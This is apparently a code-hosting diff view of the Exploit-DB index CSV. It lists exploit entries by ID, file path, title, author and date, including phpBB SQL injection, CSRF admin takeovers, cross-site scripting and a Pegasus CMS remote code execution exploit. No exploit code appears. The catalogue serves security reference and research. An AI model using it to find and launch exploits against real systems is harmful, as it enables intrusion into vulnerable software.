44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||||
|
@ -40983,3 +40985,5 @@ id,file,description,date,author,type,platform,port
|
||||||
46531,exploits/php/webapps/46531.html,"PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)",2019-03-12,"Gionathan Reale",webapps,php,80
|
46531,exploits/php/webapps/46531.html,"PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)",2019-03-12,"Gionathan Reale",webapps,php,80
|
||||||
46537,exploits/php/webapps/46537.txt,"WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion",2019-03-13,"Manuel García Cárdenas",webapps,php,80
|
46537,exploits/php/webapps/46537.txt,"WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion",2019-03-13,"Manuel García Cárdenas",webapps,php,80
|
||||||
46538,exploits/php/webapps/46538.txt,"pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting",2019-03-13,"Gionathan Reale",webapps,php,443
|
46538,exploits/php/webapps/46538.txt,"pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting",2019-03-13,"Gionathan Reale",webapps,php,443
|
||||||
|
46541,exploits/php/webapps/46541.html,"Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)",2019-03-14,LiquidWorm,webapps,php,
|
||||||
|
46542,exploits/php/webapps/46542.py,"Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution",2019-03-14,R3zk0n,webapps,php,80
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue